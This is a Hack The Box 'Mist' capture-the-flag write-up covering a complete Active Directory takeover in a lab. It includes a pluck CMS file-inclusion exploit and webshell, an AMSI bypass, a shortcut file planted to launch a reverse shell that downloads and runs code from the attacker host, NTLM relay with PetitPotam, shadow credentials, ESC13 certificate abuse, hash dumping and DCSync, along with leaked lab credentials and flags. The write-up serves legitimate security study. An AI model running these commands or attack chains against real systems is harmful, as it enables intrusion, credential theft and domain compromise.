HTB - Mist
Description
Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account’s NTLM hash, enabling a DCSync attack to obtain the Domain Administrator hash.
Enumeration
Nmap Scan
nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
80/tcp open http
nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)HTTP
http://10.10.11.17?file=mist
When clicking admin word, I was redirected to this login page
The version of pluck is 4.7.18. A quick search of the version in exploit-db the site leads to this CVE, but I don't have the admin password yet.
After deep searching for other pluck CVEs, I found unauthenticated LFI
Vulnerability Details
Following this post , I have to look under /data/settings/modules/albums folder, and I found admin_backup.php
When I included admin_backup.php, I got a hash, so I will try to crack it
On https://crackstation.net/, I was able to crack it
Initial Access
When I used the cracked password to log in as admin, I was redirected to the admin portal
Now with the admin password, I can get
RCEvia the CVE we found before
I read the exploit and decided to perform it manually rather than using the poc.
First, Go to http://10.10.11.17/admin.php?action=installmodule
Second, create a zip file containing php a shell. I will use P0wny Shell and upload it
zip module.zip p0wny.php
Finally, access the webshell at http://10.10.11.17/data/modules/module/p0wny.php
I will upgrade my shell with PowerJoker to get more flexibility because the installed modules don't persist. Maybe there is a script in the background removing them.
Lateral Movement
Looking for internal ports, there are RPC, SMB, and WinRM. That confirms there is firewall rules that prevent most inbound connections to MS01
JokerShell C:\xampp\htdocs\data> netstat -ano | findstr TCP
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2412
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2412
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
..snip..Looking at IP configuration, I found that MS01 has a different IP 192.168.100.101 with hostname of ms01.mist.htb
JokerShell C:\> ipconfig
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.100
JokerShell C:\> nslookup ms01
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 192.168.100.100
Name: ms01.mist.htb
Address: 192.168.100.101I also wanted to check AV status, So I executed this command Get-MpComputerStatus and found that it's already running on the box
JokerShell C:\Users\svc_web> Get-MpComputerStatus
AMEngineVersion : 1.1.24020.9
AMProductVersion : 4.18.24020.7
AMRunningMode : Normal
AMServiceEnabled : True
AMServiceVersion : 4.18.24020.7
AntispywareEnabled : True
AntispywareSignatureAge : 378
AntispywareSignatureLastUpdated : 3/26/2024 4:22:59 AM
AntispywareSignatureVersion : 1.407.725.0
AntivirusEnabled : True
AntivirusSignatureAge : 378
AntivirusSignatureLastUpdated : 3/26/2024 4:22:59 AM
AntivirusSignatureVersion : 1.407.725.0
BehaviorMonitorEnabled : TrueI want to find possible escalation path on ms01, so I uploaded winpeas.ps1 and PowerUp.ps1 to the box but since AV is enabled, I had to bypass AMSI first.
I created a bypass.ps1 containing common AMSI bypass (patching amsiScanBuffer), Then load the PowerUp.ps1 script
iex(iwr -UseBasicParsing 10.10.16.4/bypass.ps1)
iex(iwr -UseBasicParsing 10.10.16.4/PowerUp.ps1); Invoke-AllChecksUnfortunately, I didn't find any exploitation path with PowerUp tool but under C:\ There is an uncommon folder
JokerShell C:\> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2024 1:50 AM Common Applications
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/20/2024 5:44 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 2/21/2024 12:37 PM Users
d----- 3/26/2024 12:02 PM Windows
d----- 3/10/2024 3:21 AM xampp
JokerShell C:\Common Applications> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 1:15 AM 1118 Calculator.lnk
-a---- 5/7/2021 3:14 PM 1175 Notepad.lnk
-a---- 5/7/2021 3:15 PM 1171 Wordpad.lnk They are .lnk files to execute common programs on the system.
JokerShell C:\Common Applications> type Calculator.lnk
L?F?)@%SystemRoot%\system32\shell32.dll,-22531%windir%\system32\win32calc.exef ?-1SPS??XF?L8C???&?m?-1SPSU(L?y?9K????-????%windir%\system32\win32calc.exe%windir%\system32\win32calc.exeWhat if I can overwrite one of them and add a path to execute a reverse shell when one uses it??. First, I need to check my permission over this folder
JokerShell C:\> icacls 'Common Applications'
Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
MS01\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX,W)From the output above, The BUILTIN\Users has write access on the folder(RX,W).
On my Windows host, I create a new shortcut
On the target field, I put this payload, and inside rev.ps1 It is an encoded reverse shell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr -UseBasicParsing 10.10.16.4/rev.ps1)Also, I changed the icon to match Calculator icon from C:\Windows\System32\calc.exe to make things as real and tricky as possible
Now, I will upload it to the box
iwr 10.10.16.4/Calculator.lnk -outfile .\Calculator.lnkAfter a short time (1-2 mins), I got a shell as brandon.keywarp
The user is indeed a domain user and it has a profile folder beside other users, too
JokerShell C:\> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ==============================================
mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110
JokerShell C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/8/2025 1:00 PM Administrator
d----- 2/20/2024 6:02 AM Administrator.MIST
d----- 4/8/2025 1:00 PM Brandon.Keywarp
d-r--- 2/20/2024 5:44 AM Public
d----- 2/20/2024 9:39 AM Sharon.Mullard
d----- 4/8/2025 12:59 PM svc_webI can guess that Sharon.Mullard is a domain user, too.
At this point, with a domain user, I have to pivot to enumerate the domain controller with ligolo-ng
./proxy -selfcert // On Linux Attack HostIn a Windows box (MS01), Run:
JokerShell C:\xampp\htdocs> iwr 10.10.16.4/agent.exe -outfile .\agent.exe
JokerShell C:\xampp\htdocs> Start-Process agent.exe -ArgumentList "-connect 10.10.16.4:11601 -ignore-cert"Make sure you're in
C:\xampp\htdocsbecause it's excluded from defender
After pivoting, I can run Nmap and see the results:
nmap -iL ip.txt -F -Pn
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-dsLooking for Remote management ports, I found WinRM is running on the two hosts
nmap -iL ip.txt -p5985,3389,5986 --open
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
5985/tcp open wsman
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
5985/tcp open wsmanScript scan for the DC
nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan
Nmap scan report for 192.168.100.100
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name)
| Subject Alternative Name: DNS:DC01.mist.htb
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)I will add the two machines to my /etc/hosts file
echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts
echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hostsMy next move is to enumerate both the shared folders and the domain acls With Bloodhound, so I will upload SharpHound.exe to the host and begin the collection
I still couldn't access shared folders with no credentials
nxc smb ip.txt -u 'guest' -p '' --shares
SMB 192.168.100.100 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB 192.168.100.101 445 MS01 [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED
SMB 192.168.100.100 445 DC01 [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED
nxc smb ip.txt -u '' -p '' --shares
SMB 192.168.100.100 445 DC01 [+] mist.htb\:
SMB 192.168.100.100 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
SMB 192.168.100.101 445 MS01 [-] mist.htb\: STATUS_ACCESS_DENIEDPrivilege Escalation (MS01)
I didn't find anything that can be useful till now, So there is an attack I have to try (NTLM Relay over LDAP using WebDav) And this post is useful for performing the attacks: Post
I already know what to do, So I will proceed directly with these steps:
check if
webdavis runningIf
webdavis not running, try to enable itUsing any coercion method (
printerbug,PetitPotam, coercer, etc) to force the machine to authenticate to my hostSet up a relay agent on my host to relay the authentication coming from HTTP (
WebDav) toLDAPand performRBCDorShadow CredentialAttack
Performing RBCD depending on having account with SPN or ability to create a machine account, but Shadow Credentials depends on PKINIT authentication (usually when ADCS is installed)
When I enumerated the domain to see if I can add computer account or not, I found the value of ms-ds-machineaccountquota zero, So I can't do it.
JokerShell C:\xampp\htdocs> Get-DomainObject -Identity "DC=mist,DC=htb" -Properties ms-DS-MachineAccountQuota
ms-ds-machineaccountquota
-------------------------
0When I enumerated the domain to see if I can add computer account or not, I found msds-keycredentiallink contains a value, So Shadow Credential attack is possible.
JokerShell C:\xampp\htdocs> Get-DomainObject -Identity MS01 -Properties msds-keycredentiallink
msds-keycredentiallink
----------------------
B:828:0002000020000119F0F375256AB2B1C4FC2BDFEFAD0D21AA3D5C36890AED2D7F6FE4F3DAB2C9A62000020F090A50EB5AEE1B926A4341..snip..Now, Let's deal with WebDav, I downloaded SharpWebClientScanner.exe to query the its status but I didn't find it to be running on any host, So I have to enable it manually.
JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb
??????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????
By Mor David
[x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service runningI will use this Tool to enable it from Windows
sudo apt install mono-compelete
mcs EtwStartWebClient.cs -out:EtwStartWebClient.exe /unsafe
iwr 10.10.16.4:8000/EtwStartWebClient.exe -o .\EtwStartWebClient.exeVerify with SharpWebScanner
Then, execute the tool windows
JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe
[+] WebClient Service started successfullyNow, I need to use the coerce method, but I need credentials for it. I only have a shell with a domain user brandon.keywarp But with no password or hash.
There is one way to get the hash of the user using ADCS templates to request a certificate for the user and get their NT hash from it.
First, Upload Certify to the machine and request a certificate for the current user
.\Certify.exe request /template:User /ca:DC01\mist-DC01-CA
Copy the cert.pem (private key & Certificate) , then use this command
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxWith Certipy, I can authenticate to the domain and get the hash
certipy-ad auth -pfx cert.pfx -domain mist.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: brandon.keywarp@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brandon.keywarp.ccache'
[*] Trying to retrieve NT hash for 'brandon.keywarp'
[*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxxFor WebDav to function, It needs the hostname to connect to, but my host isn't accessible from the internal network, so I will add a port forwarding rule so that any connection that comes to ms01 . 8888 is forwarded to me at 80
[Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp
INFO[8701] Listener 0 created on remote agent! Since we found before that MS01$ has keyCredentialLink value, we need a tool to clear it and add a new one, and this is included in this version of ntlmrelayx.py After adding a new feature in this pull request.
git clone https://github.com/fortra/impacket/ && cd impacket; git fetch origin pull/1402/head:mist && git checkout mist;
python -m venv . && source ./bin/activate; pip install . && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0 && pip install setuptoolsExecute the attack
python3 PetitPotam.py -u 'brandon.keywarp' -hashes :db03d6a77a2205bc1d07082740626cc9 MS01@8888/files 192.168.100.101
sudo ntlmrelayx.py -debug -t ldaps://192.168.100.100 -i -smb2support -domain mist.htb
nc localhost 11000
$ clear_shadow_creds ms01$
$ set_shadow_creds ms01$
Get a sutiable cert to be used with certipy
cert -export -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx -password 'y5hd2VIzZgXcGREYy0uJ' -out cert.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'cert.pfx'Authenticate to the DC using the certificate and get NT hash of the computer account.
certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzzWith the computer account hash, I can create a Silver ticket to access the file system as an administrator
impacket-ticketer -nthash 17749fa7409ac85c4zzzzzzzzzzzz -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn cifs/ms01.mist.htb Administrator
export KR5CCNAME=`pwd`/Administrator.ccacheAccess the machine as an administrator
impacket-wmiexec -k -no-pass MS01.MIST.HTB
[*] SMBv3.0 dialect used
C:\>whoami
mist.htb\administratorI will dump SAM to save my progress
impacket-secretsdump -no-pass -k ms01.mist.htb
[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c40xxxxxxxx:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39bxxxxxxxxx:::Connect to the box with a local admin account:
evil-winrm -i ms01 -u Administrator -H 711e6a685af1c31c402xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users> type Administrator\Desktop\user.txtUser Flag: 0c63be3b856709838ec62a926dbad528
Privilege Escalation (DC01)
Inside Sharon.Mullard folder, there are several files
*Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /F
C:.
+---Desktop
+---Documents
¦ sharon.kdbx
¦
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
¦ cats.png
¦ image_20022024.pngThe file .kdbx is certainly keepass password manager, So it will be protected by a password.
Cats.png has nothing rather than cats images
image_200222024.png has something interesting:
A string that's been partially hidden and encoded using base64
UA7cpa[#1!_*ZXI will attempt it against keepass hash to crack it but I think I will need to do a brute force attack using hashcat. First, get the hash of keepass the database
keepass2john sharon.kdbx > keepass.hashThe input in the image was 15 chars and the string I have is 14 chars, So I can only append one ?a , which means all possible chars in hashcat
hashcat -m 13400 -a 3 keepass.hash 'UA7cpa[#1!_*ZX?a'
..snip..
$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_xxxxx
Session..........: hashcat
Status...........: CrackedTo open keepass file from Linux, I used keepassxc
sudo apt install keepassxc
keepassxc sharon.kdbx
Trying the password for all users I don't have yet, and got one user
nxc ldap dc01 -u users.lst -p 'ImTiredxxxxxxx'
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Florence.Brown:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Jonathan.Clinton:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Markus.Roheb:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Shivangi.Sumpta:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Harry.Beaucorn:xxxxxxxxxxxxxxxxx(
LDAP 192.168.100.100 389 DC01 [+] mist.htb\op_Sharon.Mullard:xxxxxxxxxxxxxxxxxLooking At bloodhound CE, User Op_sharon.mullard is a member of operatives group which can ReadGMSAPassword of Svc_CA$
┌─[kali@parrot]─[~/HackTheBox/platform/machines/mist]
└──╼ $nxc ldap dc01 -u op_Sharon.Mullard -p 'ImTirxxxxxxxxx' --gmsa
LDAPS 192.168.100.100 636 DC01 [*] Getting GMSA Passwords
LDAPS 192.168.100.100 636 DC01 Account: svc_ca$ NTLM:09814d63c9baxxxxxxxxxxxxSVC_CA$ can add KeyCredentialLink (Shadow Credential) to svc_cabackup
certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx-account svc_cabackup
ESC13: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
Source post.
From bloodhounoI can see that being a member of Certificate Services group, I can abuse ESC13 and add myself or anyone I want to Certificate Managers group
Certificate Managers group is a member of CA Backup group
CA Backup A group's member can perform ESC13, too, and get a membership in Services acountsthe group that is a member of Backup Operators group.
To summarize the attack path:
Perform
ESC13to inherit the privileges ofCertificate ManagersgroupPerform
ESC13inherit the privileges ofServices acountsgroupInherit
Backup Operatorsprivileges being inServices acountsgroup
Request a certificate for the vulnerable template managerauthentication
certipy-ad req -u 'svc_cabackup@mist.htb' -hashes :c9872f1bc10bdd522c12fc2ac9041b64 -template managerauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100Authenticate as svc_cabackup to Inherit the new privileges
certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup.ccache
Request a certificate for the vulnerable template backupsvcauthentication
certipy req -u 'svc_cabackup@mist.htb' -k -template backupsvcauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100 -target dc01.mist.htbAuthenticate as svc_cabackup to Inherit the new privileges
certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup2.ccache
Abuse Backup Operator to backup Registry hives
impacket-reg -k -no-pass mist.htb/svc_cabackup@dc01.mist.htb backup -o '\programdata'Access the DC to download the files via winRM
evil-winrm -i dc01 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:('
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> download SAM.save
Info: Downloading C:\programdata\SAM.save to SAM.save
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download SECURITY.save
Info: Downloading C:\programdata\SECURITY.save to SECURITY.save
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download SYSTEM.save
Info: Downloading C:\programdata\SYSTEM.save to SYSTEM.save
Info: Download successful!Dump the hives' secrets and perform DCSync with dc01$ account hash
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
impacket-secretsdump mist.htb/'DC01$'@dc01 -hashes :e768c4cf883a87ba9e96278990292260 -just-dc-ntlm
Access the machine as Administrator
Root Flag: f5dcf7a3f2377ef6759aa413c768303f
Last updated